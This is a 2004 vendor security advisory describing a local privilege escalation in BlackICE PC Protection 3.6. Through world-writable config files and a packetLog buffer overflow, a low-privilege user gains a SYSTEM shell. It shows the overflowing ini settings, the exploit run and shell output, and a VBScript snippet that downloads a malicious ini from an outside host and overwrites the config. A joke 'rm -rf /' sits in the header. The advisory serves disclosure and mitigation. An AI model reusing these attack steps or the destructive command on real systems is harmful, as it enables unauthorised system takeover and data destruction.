Secure Network Operations, Inc.             http://www.secnetops.com/research
Strategic Reconnaissance Team               research[at]secnetops[.]com
Team Lead Contact                           kf[at]secnetops[.]com
Spam Contact            `rm -rf /`@snosoft.com

Our Mission:
************************************************************************
Secure Network Operations offers expertise in Networking, Intrusion 
Detection Systems (IDS), Software Security Validation, and 
Corporate/Private Network Security. Our mission is to facilitate a 
secure and reliable Internet and inter-enterprise communications 
infrastructure through the products and services we offer. 

To learn more about our company, products and services or to request a 
demo of ANVIL FCS please visit our site at http://www.secnetops.com, or 
call us at: 978-263-3829


Quick Summary:
************************************************************************
Advisory Number         : SRT2004-01-17-0227
Product                 : BlackICE PC Protection
Version                 : <= 3.6.cbz ?
Vendor                  : http://blackice.iss.net/product_pc_protection.php
Class                   : Local
Criticality             : Low to Medium 
Operating System(s)     : Win32 


Notice
************************************************************************
1-2 day Early Warning List:
---------------------------
Secure Network Operations, inc. will very shortly have its own advisory 
notification mailing list. This list will notify you of advisories 1-2 
days in advance of public release to other mailing lists. To subscribe 
please visit http://advisories.secnetops.com in the immediate future. 

30-60 day Early Warning List:
-----------------------------
Our early warning service will notify you of new vulnerabilities 30-60 
days in advance of public release. This service has been created to protect 
companies by allowing them to repair security vulnerabilities before they 
become public knowledge. To purchase a one year subscription to this 
service please contact us at 978-263-3767.

Alert
***********************************************************************
Our advisories will contain full details excluding a working Proof of 
Concept. Our web page will contain our working proof of concept for the 
advisory if it exists. Yes folks this is a policy change for us. We 
will exercise our own discretion in regards to delay of exploit release
vs advisory release. List subscribers will have advanced access to working
proof of concept code depending on the severity and list subscription type. 


Basic Explanation
************************************************************************
High Level Description  : BlackICE allows local users to become SYSTEM. 
What to do              : Enable BlackICE Application Protection or upgrade. 


Basic Technical Details
************************************************************************
Proof Of Concept Status : Proof of concept is attached to this advisory. 


Low Level Description   : BlackICE products provide Intrusion Detection, 
personal firewall, and application protection all in one easy to use package. 
The technology behind BlackICE goes beyond basic file scanning to actually 
monitoring ongoing system activity and communications so that it can 
automatically stop suspect activity before it can harm your system. 
 
Based on vendor documentation BlackICE will run on the following systems: 
Windows 98 (retail, SP1, Second Edition), Windows NT 4 (SP5, SP6, SP6a), 
Windows 2000 (SP1, SP2, SP3), Windows Me, and Windows XP Pro (SP1) / Home 
(SP1). Please note that the suggested browser versions (Internet Explorer 
5.0 or greater) depending on patch level may aid in facilitating the below 
mentioned attack scenarios. Please see http://die.leox.com/ie_unpatched/index.html

The following text is a documentation of my personal experience with BlackICE. 
This text may or may not reflect your experience with BlackICE products. My 
testing and research was done using a random copy of a BlackICE eval 
(BIDEvalSetup27360.exe) that was lying around on an internal file share. I 
took all defaults while installing BlackICE. After clicking next, next, next...
all the way through the install I ended up with: 

Network ICE BlackICE Defender Rel 2.5.ch EVALUATION
. blackdll.dll  version 2.5.33
. blackdrv.sys  version 2.5.35 (for Win NT/2000)
. blackdrv.vxd  version 2.5.34 (for Win 95/98/Me)
. blackd.exe    version 2.5.36 
. blackice.exe  version 2.5.34

The original ini files are installed as follows. (This is a GOOD thing)
Administrator@none /cygdrive/f/Program Files/Network ICE/BlackICE
$ ls -al *ini
-rwx------+   1 Administ None          111 Jan 12 05:59 blackice.ini
-rwx------+   1 Administ None         1486 Jan 12 05:59 firewall.ini
-rwx------+   1 Administ None           84 Jan 12 05:59 sigs.ini

You should note that the above files are NOT everyone full control. 

As soon as we open the BlackICE gui we see that there are some nice red 
exclamation marks. In the status window it says [Informational] A firewall 
filter could not be set. Clicking on advICE tells us "To correct this problem, 
make sure you have updated BlackICE to the latest release or patch applicable 
to your operating system". 

That’s fair enough... I have no problem updating my old demo. Next we click on 
tools download update. I just accept all defaults and upgrade to version 
3.6cbz. I have tell it I am still evaluating the product obviously... I am not 
sure if anything changes when you purchase a real version (enter a serial 
number). I have not used any ISS products beyond this particular demo version 
of BlackICE. 

Our version numbers are now:

Network ICE BlackICE PC Protection Release 3.6.cbz
. blackdll.dll  version 3.6.37
. BlackDrv.sys  version 3.6.37
. iss-pam1.dll  version 3.6.50
. blackd.exe    version 3.6.48 
. blackice.exe  version 3.6.44

After the update to 3.6cbz the local security of our install appears to have 
been downgraded. Above only the Administrator had access to the .ini files. Now 
everyone has full control of them. I feel this causes its own set of security 
issues aside from what we document below. 

Administrator@none /cygdrive/f/Program Files/Network ICE/BlackICE
$ ls -al *ini
-rwxrwxrwx+   1 Administ None          233 Jan 12 06:10 blackice.ini
-rwxrwxrwx+   1 Administ None         1605 Jan 12 06:10 firewall.ini
-rwxrwxrwx+   1 Administ None          178 Jan 12 06:10 protect.ini
-rwxrwxrwx+   1 Administ None           84 Jan 12 06:10 sigs.ini

The default install options leave Application Protection off... oddly enough I 
had considered turning it on at first but I am a lazy guy, it told me it would 
take "several minutes" to install Application Protection. I was really not 
interested in waiting several minutes. =] 

During the discovery phase there was some disagreement over the various attack 
scenarios. The discussion centered around the multi-user capabilities or lack 
there of in the above mentioned operating systems. So just for the sake of 
argument the machine that I am evaluating BlackICE on is Windows 2000 Server SP4, 
no terminal services are installed (thus classifying the machine for an Enterprise 
BlackICE solution?). The only service on this machine is VNC. VNC is provided 
so that various individuals (not necessarily administrators) can login to this 
machine remotely. The configuration for VNC is set to "Logoff Workstation when 
last client disconnects to provide some level of additional security. 

The point of the below scenarios are to show that the config file permissions
combined with the buffer overflow in the blackd.exe service can be used in 
conjunction with other attacks to further leverage privileges. 

After the install I have rebooted, the login prompt is on the console, and VNC 
is listening just as it was during the installation. From a remote box I connect 
as a user with minimal rights. Upon connecting via VNC I must send control alt 
del and then login. I now have local access to the machine that I am attempting 
to exploit via remote control software. You should note that NO BlackICE warnings 
were triggered by the VNC connection. Keep in mind that BlackICE has not been 
tweaked beyond its initial configuration either. 

Lets see who we are really quick. 

F:\Documents and Settings\kf>whoami
NONE\kf

A quick netstat shows us the ports that are currently open. 

F:\Documents and Settings\kf>netstat -a

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    none:epmap             none:0                 LISTENING
  TCP    none:microsoft-ds      none:0                 LISTENING
  TCP    none:1025              none:0                 LISTENING
  TCP    none:1026              none:0                 LISTENING
  TCP    none:3389              none:0                 LISTENING
  TCP    none:netbios-ssn       none:0                 LISTENING
  UDP    none:microsoft-ds      *:*
  UDP    none:netbios-ns        *:*
  UDP    none:netbios-dgm       *:*

If you look at task manager you will note that blackd.exe is running as SYSTEM. 

After some toying with the GUI we discovered a buffer overflow in the packetLog
functionality. The overflow can be triggered with the following .ini options. 

[Packet Logging]
packetLog.logging=enabled
packetLog.fileprefix=<aaaaa...b0f here...aaaaa>
packetLog.maxKbytes=2048
packetLog.maxfiles=10

A 217 Character log prefix makes BlackICE blackd crash with the EIP and ECX both
overwritten with user supplied data.

We simply run the BlackICE exploit that we prepared for the above condition. 

F:\Documents and Settings\kf> perl BlackICEdefender_ex.pl

Wait a bit for the FileChange Event to trigger, or trigger any alert yourself. 
Ssh traffic seemed like a quick and easy alert to trigger in the event the file 
changes are not detected immediately.

F:\Program Files\Network ICE\BlackICE>telnet 192.168.1.1 22
Connecting To 192.168.1.1...
SSH-2.0-OpenSSH_3.4p1 Debian 1:3.4p1-1.woody.2.1
                                                Protocol mismatch.

Check what’s listening again. You should note the new port 9191 in the list. 

F:\Documents and Settings\kf>netstat -a

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    none:epmap             none:0                 LISTENING
  TCP    none:microsoft-ds      none:0                 LISTENING
  TCP    none:1025              none:0                 LISTENING
  TCP    none:1026              none:0                 LISTENING
  TCP    none:3389              none:0                 LISTENING
  TCP    none:9191              none:0                 LISTENING
  TCP    none:netbios-ssn       none:0                 LISTENING
  UDP    none:microsoft-ds      *:*
  UDP    none:netbios-ns        *:*
  UDP    none:netbios-dgm       *:*

F:\Documents and Settings\kf>telnet localhost 9191
Connecting To localhost...

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

F:\Program Files\Network ICE\BlackICE>whoami
NT AUTHORITY\SYSTEM

At this point we pretty much have the equivalent of root access to this 
windows machine. 

With out local access to the machine I feel that it is still quite trivial 
to trigger this vulnerability. A quick trip to http://die.leox.com/ie_unpatched/
gave me enough to prove the basic point. The following Full-Disclosure post 
outlines the attack and its limitations. 

http://www.mail-archive.com/full-disclosure@lists.netsys.com/msg06791.html

Obviously the example requires interaction from a victim. I am sure there is no 
shortage on other bugs that could deliver a malicious blackice.ini. 

<script language="vbscript">
const adTypeBinary = 1
const adSaveCreateOverwrite = 2
const adModeReadWrite = 3
set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
xmlHTTP.open "GET","http://www.snosoft.com/blackice.ini",false
xmlHTTP.send
contents = xmlHTTP.responseBody
Set oStr = CreateObject("ADODB.Stream")
oStr.Mode = adModeReadWrite
oStr.Type = adTypeBinary
oStr.Open
oStr.Write(contents)
oStr.SaveToFile "F:\Program Files\Network ICE\BlackICE\blackice.ini", adSaveCreateOverwrite
</script>

Opening the above html file from within the MyComputer zone would cause the 
blackice.ini to be overwritten. 

The final note I have to include on this advisory is that the BlackICE Application 
Protection DOES work... so use it. When the AP is enabled this attack is not 
possible because BlackICE simply will not allow the configfiles to be modified. 

Functional PoC can be located in the archives at http://advisories.secnetops.com

Vendor Status           : Vendor fixes should be available as of 1/27/04

Bugtraq URL             : To be assigned. 

Disclaimer
----------------------------------------------------------------------
This advisory was released by Secure Network Operations,Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Release of exploit code is done at our 
own discretion. 
----------------------------------------------------------------------
All content of this advisory is property of Secure Network Operations.
----------------------------------------------------------------------
Secure Network Operations, Inc. || http://www.secnetops.com
"Embracing the future of technology, protecting you."